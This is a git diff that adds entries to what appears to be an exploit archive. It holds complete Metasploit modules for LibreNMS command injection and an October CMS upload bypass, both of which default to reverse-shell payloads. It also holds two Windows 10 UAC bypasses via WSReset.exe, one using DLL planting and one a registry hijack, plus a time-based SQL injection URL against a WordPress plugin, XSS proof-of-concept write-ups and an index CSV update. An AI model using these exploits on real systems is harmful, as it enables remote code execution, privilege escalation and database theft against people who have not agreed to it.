diff --git a/exploits/linux/remote/47375.rb b/exploits/linux/remote/47375.rb new file mode 100755 index 000000000..a10dbe03a --- /dev/null +++ b/exploits/linux/remote/47375.rb @@ -0,0 +1,231 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'LibreNMS Collectd Command Injection', + 'Description' => %q( + This module exploits a command injection vulnerability in the + Collectd graphing functionality in LibreNMS. + + The `to` and `from` parameters used to define the range for + a graph are sanitized using the `mysqli_escape_real_string()` + function, which permits backticks. These parameters are used + as part of a shell command that gets executed via the `passthru()` + function, which can result in code execution. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Eldar Marcussen', # Vulnerability discovery + 'Shelby Pace' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2019-10669' ], + [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + [ 'Linux', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' } + } + ] + ], + 'DisclosureDate' => '2019-07-15', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]), + OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]), + OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ]) + ]) + end + + def check + res = send_request_cgi!('method' => 'GET', 'uri' => target_uri.path) + return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms') + + about_res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'pages', 'about.inc.php') + ) + + return Exploit::CheckCode::Detected unless about_res && about_res.code == 200 + + version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/) + return Exploit::CheckCode::Detected unless version && version.length > 1 + vprint_status("LibreNMS version #{version[1]} detected") + version = Gem::Version.new(version[1]) + + return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50') + end + + def login + login_uri = normalize_uri(target_uri.path, 'login') + res = send_request_cgi('method' => 'GET', 'uri' => login_uri) + fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200 + + cookies = res.get_cookies + login_res = send_request_cgi( + 'method' => 'POST', + 'uri' => login_uri, + 'cookie' => cookies, + 'vars_post' => + { + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + } + ) + + fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302 + + cookies = login_res.get_cookies + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path), + 'cookie' => cookies + ) + fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices') + + print_status('Successfully logged into LibreNMS. Storing credentials...') + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + login_res.get_cookies + end + + def get_version + uri = normalize_uri(target_uri.path, 'about') + + res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies ) + fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200 + + html = res.get_html_document + version = html.search('tr//td//a') + fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty? + version.each do |e| + return $1 if e.text =~ /(\d+\.\d+\.?\d*)/ + end + end + + def get_device_ids + version = get_version + print_status("LibreNMS version: #{version}") + + if version && Gem::Version.new(version) < Gem::Version.new('1.50') + dev_uri = normalize_uri(target_uri.path, 'ajax_table.php') + format = '+list_detail' + else + dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device') + format = 'list_detail' + end + + dev_res = send_request_cgi( + 'method' => 'POST', + 'uri' => dev_uri, + 'cookie' => @cookies, + 'vars_post' => + { + 'id' => 'devices', + 'format' => format, + 'current' => '1', + 'sort[hostname]' => 'asc', + 'rowCount' => 50 + } + ) + + fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200 + + json = JSON.parse(dev_res.body) + fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty? + + json = json['rows'] + fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty? + + hosts = [] + json.each do |row| + hostname = row['hostname'] + next if hostname.nil? + + id = hostname.match('href=\"device\/device=(\d+)\/') + next unless id && id.length > 1 + hosts << id[1] + end + + fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty? + + hosts + end + + def get_plugin_info(id) + uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd") + + res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies ) + return unless res && res.code == 200 + + html = res.get_html_document + plugin_link = html.at('div[@class="col-md-3"]//a/@href') + return if plugin_link.nil? + + plugin_link = plugin_link.value + plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }] + c_plugin = plugin_hash['c_plugin'] + c_type = plugin_hash['c_type'] + c_type_instance = plugin_hash['c_type_instance'] || '' + c_plugin_instance = plugin_hash['c_plugin_instance'] || '' + + return c_plugin, c_type, c_plugin_instance, c_type_instance + end + + def exploit + req_uri = normalize_uri(target_uri.path, 'graph.php') + @cookies = login + + dev_ids = get_device_ids + + collectd_device = -1 + plugin_name = nil + plugin_type = nil + plugin_instance = nil + plugin_type_inst = nil + dev_ids.each do |device| + collectd_device = device + plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device) + break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst) + collectd_device = -1 + end + + fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1 + print_status("Sending payload via device #{collectd_device}") + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => req_uri, + 'cookie' => @cookies, + 'vars_get' => + { + 'device' => collectd_device, + 'type' => 'device_collectd', + 'to' => Rex::Text.rand_text_numeric(10), + 'from' => "1`#{payload.encoded}`", + 'c_plugin' => plugin_name, + 'c_type' => plugin_type, + 'c_plugin_instance' => plugin_instance, + 'c_type_instance' => plugin_type_inst + } + ) + end +end \ No newline at end of file diff --git a/exploits/php/remote/47376.rb b/exploits/php/remote/47376.rb new file mode 100755 index 000000000..48047c147 --- /dev/null +++ b/exploits/php/remote/47376.rb @@ -0,0 +1,157 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'October CMS Upload Protection Bypass Code Execution', + 'Description' => %q{ + This module exploits an Authenticated user with permission to upload and manage media contents can + upload various files on the server. Application prevents the user from + uploading PHP code by checking the file extension. It uses black-list based + approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ + Definitions.php:blockedExtensions(). + This module was tested on October CMS version v1.0.412 on Ubuntu. + }, + 'Author' => + [ + 'Anti Räis', # Discovery + 'Touhid M.Shaikh ', # Metasploit Module + 'SecureLayer7.net' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB','41936'], + ['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'], + ['CVE','2017-1000119'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'PAYLOAD' => 'php/meterpreter/reverse_tcp', + 'ENCODER' => 'php/base64', + }, + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'October CMS v1.0.412', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Apr 25 2017')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), + OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin']) + ]) + end + + def uri + return target_uri.path + end + + def check + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js') + }) + rescue + vprint_error('Unable to access the /assets/js/framework.js file') + return CheckCode::Unknown + end + + if res && res.code == 200 + return Exploit::CheckCode::Appears + end + + return CheckCode::Safe + end + + def login + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'), + 'method' => 'GET' + }) + + if res.nil? + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + /name="_session_key" type="hidden" value="(?[A-Za-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil? + + /name="_token" type="hidden" value="(?[A-Za-z0-9"]+)">/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil? + vprint_good("Token for login : #{token}") + vprint_good("Session Key for login : #{session}") + + cookies = res.get_cookies + vprint_status('Trying to Login ......') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'), + 'cookie' => cookies, + 'vars_post' => Hash[{ + '_session_key' => session, + '_token' => token, + 'postback' => '1', + 'login' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] + }.to_a.shuffle] + }) + + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil? + + # if we redirect. then we assume we have authenticated cookie. + if res.code == 302 + print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD']) + return cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]") + end + end + + + def exploit + cookies = login + + evil = "" + payload_name = "#{rand_text_alpha(8..13)}.php5" + + post_data = Rex::MIME::Message.new + post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"') + post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}") #payload + data = post_data.to_s + + register_files_for_cleanup(payload_name) + vprint_status("Trying to upload malicious #{payload_name} file ....") + res = send_request_cgi({ + 'uri' => normalize_uri(uri, 'backend', 'cms', 'media'), + 'method' => 'POST', + 'cookie' => cookies, + 'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' }, + 'Connection' => 'close', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + send_request_cgi({ + 'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name), + 'method' => 'GET' + }) + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47371.txt b/exploits/php/webapps/47371.txt new file mode 100644 index 000000000..a9f7c8c93 --- /dev/null +++ b/exploits/php/webapps/47371.txt @@ -0,0 +1,36 @@ +# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection +# inurl:"\wp-content\plugins\photo-gallery" +# Date: 09-10-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: https://10web.io/ +# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip +# Version: Up to v1.5.34 +# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap +# CVE : 2019-16119 + +# Software description: +Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. + + +# Technical Details & Impact: +Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from +them. + +# POC +In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection. Following is the POC, + +1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=&width=785&height=550&bwg_nonce=9e367490cc& + +2. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc& + + +# Timeline +09-01-2019 - Vulnerability Reported +09-03-2019 - Vendor responded +09-04-2019 - New version released (1.5.35) +09-10-2019 - Full Disclosure + +# References: +https://wordpress.org/plugins/photo-gallery/#developers +https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119 \ No newline at end of file diff --git a/exploits/php/webapps/47372.txt b/exploits/php/webapps/47372.txt new file mode 100644 index 000000000..a1dd2ff24 --- /dev/null +++ b/exploits/php/webapps/47372.txt @@ -0,0 +1,38 @@ +# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting +# inurl:"\wp-content\plugins\photo-gallery" +# Date: 09-10-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: https://10web.io/ +# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip +# Version: Up to v1.5.34 +# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows +# CVE : 2019-16117 + +# Software description: +Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. + + +# Technical Details & Impact: +XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. + + +# POC + +1. In Add Gallery/Images tab +2. Edit current image gallery +3. In Alt/Title or Description text area add XSS payload e.g; + + +4. Click Save and preview. +5. It will show pop-up confirming existence of XSS vulnerability + +# Timeline +09-01-2019 - Vulnerability Reported +09-03-2019 - Vendor responded +09-04-2019 - New version released (1.5.35) +09-10-2019 - Full Disclosure + +# References: +https://wordpress.org/plugins/photo-gallery/#developers +https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/models/Galleries.php?old=2135029&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fmodels%2FGalleries.php +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16117 \ No newline at end of file diff --git a/exploits/php/webapps/47373.txt b/exploits/php/webapps/47373.txt new file mode 100644 index 000000000..2f9c8ceca --- /dev/null +++ b/exploits/php/webapps/47373.txt @@ -0,0 +1,38 @@ +# Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Persistent Cross Site Scripting +# inurl:"\wp-content\plugins\photo-gallery" +# Date: 09-10-2019 +# Exploit Author: MTK (http://mtk911.cf/) +# Vendor Homepage: https://10web.io/ +# Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip +# Version: Up to v1.5.34 +# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows +# CVE : 2019-16118 + +# Software description: +Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes. + + +# Technical Details & Impact: +XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. + + +# POC + +1. Go to options tab select watermark tab +2. Select text as watermark type +3. Add watermark text as XSS payload e.g; +"'> 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)', + 'Description' => %q{ + This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool + is run with the "autoElevate" property set to true, however it can be moved to + a new Windows directory containing a space (C:\Windows \System32\) where, upon + execution, it will load our payload dll (propsys.dll). + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'ACTIVELabs', # discovery + 'sailay1996', # poc + 'timwr', # metasploit module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [[ 'Automatic', {} ]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'EXITFUNC' => 'process', + 'WfsDelay' => 15 + }, + 'DisclosureDate' => 'Aug 22 2019', + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ], + }, + 'References' => [ + ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'], + ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'], + ['URL', 'https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e'], + ], + ) + ) + end + + def check + if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") + return CheckCode::Appears + end + CheckCode::Safe + end + + def exploit + if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 + fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + end + + # Make sure we have a sane payload configuration + if sysinfo['Architecture'] != payload.arch.first + fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target') + end + + check_permissions! + + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + exploit_win_dir = "C:\\Windows \\" + exploit_dir = "C:\\Windows \\System32\\" + exploit_file = exploit_dir + "WSReset.exe" + unless exists? exploit_win_dir + print_status("Creating directory '#{exploit_win_dir}'...") + session.fs.dir.mkdir(exploit_win_dir) + end + unless exists? exploit_dir + print_status("Creating directory '#{exploit_dir}'...") + session.fs.dir.mkdir(exploit_dir) + end + unless exists? exploit_file + session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file) + end + + payload_dll = "C:\\Windows \\System32\\propsys.dll" + print_status("Creating payload '#{payload_dll}'...") + payload = generate_payload_dll + write_file(payload_dll, payload) + print_status("Executing WSReset.exe...") + begin + session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true}) + rescue ::Exception => e + print_error(e.to_s) + end + print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!") + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + print_status('UAC is Enabled, checking level...') + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end \ No newline at end of file diff --git a/exploits/windows/local/47378.rb b/exploits/windows/local/47378.rb new file mode 100755 index 000000000..fb2621c93 --- /dev/null +++ b/exploits/windows/local/47378.rb @@ -0,0 +1,156 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Post::Windows::Priv + include Post::Windows::Runas + + def initialize(info = {}) + super( + update_info(info, + 'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry', + 'Description' => %q( + This module exploits a flaw in the WSReset.exe file associated with the Windows + Store. This binary has autoelevate privs, and it will run a binary file + contained in a low-privilege registry location. By placing a link to + the binary in the registry location, WSReset.exe will launch the binary as + a privileged user. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'ACTIVELabs', # discovery + 'sailay1996', # poc + 'bwatters-r7', # metasploit module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [[ 'Automatic', {} ]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'WfsDelay' => 15 + }, + 'DisclosureDate' => 'Feb 19 2019', + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ] + }, + 'References' => [ + ['URL', 'https://www.activecyber.us/activelabs/windows-uac-bypass'], + ['URL', 'https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html'], + ['URL', 'https://github.com/sailay1996/UAC_bypass_windows_store'], + ] + ) + ) + register_options( + [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])] + ) + + end + + def check + if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") + return CheckCode::Appears + end + + CheckCode::Safe + end + + def exploit + check_permissions! + case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + # get directory locations straight + win_dir = session.sys.config.getenv('windir') + vprint_status("win_dir = " + win_dir) + tmp_dir = session.sys.config.getenv('tmp') + vprint_status("tmp_dir = " + tmp_dir) + exploit_dir = win_dir + "\\System32\\" + vprint_status("exploit_dir = " + exploit_dir) + reset_filepath = exploit_dir + "WSReset.exe" + vprint_status("exploit_file = " + reset_filepath) + + # make payload + payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.exe' + payload_pathname = tmp_dir + '\\' + payload_name + vprint_status("payload_pathname = " + payload_pathname) + vprint_status("Making Payload") + payload = generate_payload_exe + reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}" + vprint_status("reg_command = " + reg_command) + registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command" + + + # make registry changes + vprint_status("Making Registry Changes") + begin + registry_createkey(registry_key) + registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ") + registry_setvaldata(registry_key, '', reg_command, "REG_SZ") + rescue ::Exception => e + print_error(e.to_s) + end + vprint_status("Registry Changes Complete") + # Upload payload + vprint_status("Uploading Payload to #{payload_pathname}") + write_file(payload_pathname, payload) + vprint_status("Payload Upload Complete") + + vprint_status("Launching " + reset_filepath) + begin + session.sys.process.execute("cmd.exe /c \"#{reset_filepath}\"", nil, 'Hidden' => true) + rescue ::Exception => e + print_error(e.to_s) + end + print_warning("This exploit requires manual cleanup of '#{payload_pathname}!") + # wait for a few seconds before cleaning up + sleep(20) + vprint_status("Removing Registry Changes") + registry_deletekey(registry_key) + vprint_status("Registry Changes Removed") + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + print_status('UAC is Enabled, checking level...') + vprint_status('Checking admin status...') + admin_group = is_in_admin_group? + if admin_group.nil? + print_error('Either whoami is not there or failed to execute') + print_error('Continuing under assumption you already checked...') + else + if admin_group + print_good('Part of Administrators group! Continuing...') + else + fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') + end + end + + if get_integrity_level == INTEGRITY_LEVEL_SID[:low] + fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') + end + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e8bdd9282..68d818a69 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10676,6 +10676,8 @@ id,file,description,date,author,type,platform,port 47341,exploits/windows/local/47341.txt,"Kaseya VSA agent 9.5 - Privilege Escalation",2019-09-02,NF,local,windows, 47344,exploits/linux/local/47344.rb,"ktsuss 1.4 - suid Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux, 47345,exploits/linux/local/47345.rb,"ptrace - Sudo Token Privilege Escalation (Metasploit)",2019-09-03,Metasploit,local,linux, +47377,exploits/windows/local/47377.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)",2019-09-10,Metasploit,local,windows, +47378,exploits/windows/local/47378.rb,"Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)",2019-09-10,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17662,6 +17664,8 @@ id,file,description,date,author,type,platform,port 47353,exploits/linux/remote/47353.rb,"AwindInc SNMP Service - Command Injection (Metasploit)",2019-09-05,Metasploit,remote,linux, 47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple, 47358,exploits/linux/remote/47358.py,"FusionPBX 4.4.8 - Remote Code Execution",2019-09-06,Askar,remote,linux, +47375,exploits/linux/remote/47375.rb,"LibreNMS - Collectd Command Injection (Metasploit)",2019-09-10,Metasploit,remote,linux, +47376,exploits/php/remote/47376.rb,"October CMS - Upload Protection Bypass Code Execution (Metasploit)",2019-09-10,Metasploit,remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41709,11 +41713,14 @@ id,file,description,date,author,type,platform,port 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php, 47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php, -47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php, +47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80 47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple, 47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple, -47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple, -47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php, +47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple,80 +47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80 47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi, -47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php, -47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php, +47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php,80 +47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80 +47371,exploits/php/webapps/47371.txt,"WordPress Plugin Photo Gallery 1.5.34 - SQL Injection",2019-09-10,MTK,webapps,php,80 +47372,exploits/php/webapps/47372.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting",2019-09-10,MTK,webapps,php,80 +47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80